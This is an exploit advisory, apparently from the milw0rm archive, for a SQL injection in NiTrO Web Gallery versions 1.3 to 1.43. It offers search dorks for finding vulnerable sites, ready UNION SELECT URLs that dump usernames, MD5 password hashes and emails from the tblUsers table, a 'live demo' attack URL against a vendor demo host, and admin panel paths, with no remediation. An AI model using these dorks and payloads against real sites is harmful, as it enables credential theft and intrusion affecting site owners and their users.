######################################################################### #################### Viva IslaM Viva IslaM ############################## ## ## Remote SQL Injection Vulnerability ## ## NiTrO Web Gallery V1.3 - V1.4- V1.41 - 1.42 - V1.43 ( albums.php section ) ## ######################################################################### ######################################################################### ## ## AuTh0r : Mr.SQL ## ## H0ME : WwW.PaL-HaCkEr.CoM ## ## Email : SQL@Hotmail.it ## ## !! SYRIAN HaCkErS !! ######################## ######################## ## ## Script : NiTrO Web Gallery ## ## Versions : V1.3 - V1.4- V1.41 - V1.42 - V1.43 ## ## Site : www.nitropowered.net <<>> Download The Script : http://www.nitropowered.net/downloads/ ## ######################## ######################## ## ## D0rk 1 : allinurl: "albums.php" section cats action show CatId ## ## D0rk 2 : "(C) This site is NITROpowered!" ## ## -(:: SQL ::)- ## ## www.site.com/ ## albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8+from+tblUsers/* ## 0r ## albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/* ## ## -(:: L!VE DEMO ::)- ## ## http://demo.nitropowered.de/albums.php?section=cats&action=show&CatId=-1+union+select+1,concat_ws(0x3a3a,UserName,UserPassword,UserEmail),3,4,5,6,7,8,9+from+tblUsers/* ## ######################## ######################## ## -(:: Admin Panel ::)- ## ## www.site.com/?admin=1 ## www.site.com/admin/ ################### ################### -(:: N0Te ::)- tblUsers maybe this not admin table // (( Passwords => MD5 )) ;) ###################################################################################################### ###################################################################################################### -(:: !Gr3E3E3E3E3E3E3TzZ! ::)- :: HaCkEr-EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: MusliMs HaCkErs :: ###################################################################################################### # milw0rm.com [2008-06-16]